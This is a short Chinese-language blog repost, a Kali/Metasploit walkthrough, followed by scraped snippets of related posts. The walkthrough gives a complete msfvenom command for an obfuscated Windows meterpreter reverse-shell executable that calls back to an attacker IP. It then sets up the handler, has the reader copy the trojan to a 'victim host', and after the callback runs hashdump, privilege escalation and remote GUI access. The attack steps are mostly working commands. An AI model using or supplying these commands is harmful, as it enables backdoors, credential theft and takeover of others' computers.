1.启动msfconsole命令模式
2.msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe
3.启动msfconsole命令模式 use exploit/multi/handler  使用handler这个模块,set PAYLOAD windows/meterpreter/reverse_tcp   show options如果看到没有热河参数直接下一步(set LHOST=自己的ip set LPORT=端口),
  然后
 使用这个shellcode 然后show options 看到提示 LHOST LPORT 这里填生成木马的自己的ip和端口 set LHOST 自己的ip 回车 然后set LPORT 端口
4.exploit 回车 然后等待目标点击test.ext文件上线

1.执行以下命令:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe
2.将test.exe复制到受害者主机上
3.在Kali中输入msfconsole,并按照下图进行配置:
4.执行exploit,然后在受害者主机上运行test.exe后门木马,Metasploit接到反馈
   session
得到meterpreter后,可以执行getuid、hashdump以及提权操作,还可以通过getgui命令拿受害主机的图形界面。

转载于:https://www.cnblogs.com/sugarxt/p/10557658.html

kali之msfconsole相关推荐

  1. kali终端打不开以及msfconsole打不开

    卡利出现的问题 kali终端terminal emulator打不开 kali中msfconsole打不开 kali终端terminal emulator打不开 解决方法 1.crtl + alt + ...

  2. Kali安装之后必做20件事 第二版(2017-07-07不断更新)

    原文地址: http://blog.niuti.org/post/380915_5a5b269# 一,更换比较快的软件源 修改sources.list文件(su): leafpad /etc/apt/ ...

  3. Kali Linux渗透测试实战 第一章

    玄魂 · 2013/12/26 16:23 作者博客:www.xuanhun521.com/ 1.1 Kali Linux简介 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需 ...

  4. HA: Forensics靶机渗透测试

    文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...

  5. 20159208 《网络攻防实践》第七周学习总结

    20159208 <网络攻防实践>第七周学习总结 教材学习内容总结 20159208 <网络攻防实践>第七周学习总结 教材学习内容总结 本周主要学习了教材的第七章:Window ...

  6. ProxyChains

    proxychains-ng:https://github.com/rofl0r/proxychains-ng proxychains:https://github.com/haad/proxycha ...

  7. 《网络对抗》Exp5 MSF基础应用

    20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:渗透攻击的模块合集,将真正要负责攻 ...

  8. 20145226夏艺华 后门原理与实践

    20145226夏艺华 后门原理与实践 实验主要内容 使用ncat.socat实现两台电脑间的后门连接:meterpreter的应用:MSF POST模块的使用 基础问题回答 例举你能想到的一个后门进 ...

  9. Windows系统利用5次shift维权漏洞复现

    操作系统: Windows 7 旗舰版 工具: kali系统的msfconsole 5次shift维权原理 Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\Syste ...

  10. 【转载】Kali-linux安装之后的简单设置

         1.更新软件源: 修改sources.list文件: leafpad /etc/apt/sources.list 然后选择添加以下适合自己较快的源(可自由选择,不一定要全部): #官方源 d ...

最新文章

  1. 锐捷大中型企业VLAN网络方案
  2. 基础中的基础。CANVAS step01
  3. myeclipse安装svn插件
  4. 『物理社工』五一回家的“小插曲”
  5. 工作174:数组转换为对象项目案例
  6. 在win8下安装使用java及在win8下部署java环境变量-图文
  7. 《Java编码指南:编写安全可靠程序的75条建议》—— 指南19:对细粒度的安全定义自定义安全权限...
  8. 中源数聚携手中科点击共推管理咨询变革
  9. win11搜索栏无法输入 Windows11搜索栏无法输入的解决方法
  10. PHP远程操纵Wordpress的方法(流程剖析)
  11. web服务器通信原理
  12. iis6.0远程代码执行漏洞
  13. 公司职员薪水管理系统(List)
  14. (三十七)java SpringCloud版本b2b2c鸿鹄云商平台全套解决方案
  15. CSS强制图像调整大小并保持纵横比
  16. python3.8零基础入门教程_正版 Python 3.8编程快速入门 针对wan全零基础入门的读者 采用*小化安装+极简代码的教学...
  17. linux服务器开机提示f1,Dell的Linux服务器开机按F1解决方法
  18. word文档保存的时候,就会出现“文件许可权错误,word 无法完成保存文件”的提示
  19. java学籍管理系统_JavaWeb实现学生学籍信息管理系统
  20. 【整理】MySQL引擎

热门文章

  1. java 网吧管理系统_java网吧信息管理系统
  2. 极通EWEBS远程接入v4.2 XP专版
  3. php如何大批量群发微信模板消息,如何用php实现发送微信模板消息呢?
  4. php微信推送的模板信息内容都是空,微信模板消息 推送成功 但是内容显示空白...
  5. 使用微软官方升级工具升级win11的方法
  6. 带下拉菜单截图 巧用PrtSc截图键
  7. dw01均衡电路_基于DW01芯片的锂电池保护电路设计
  8. Linux下搭建打印机共享服务器(支持苹果AirPrint)
  9. pdf格式压缩大小,pdf如何压缩大小?
  10. 国产高分系列卫星平台介绍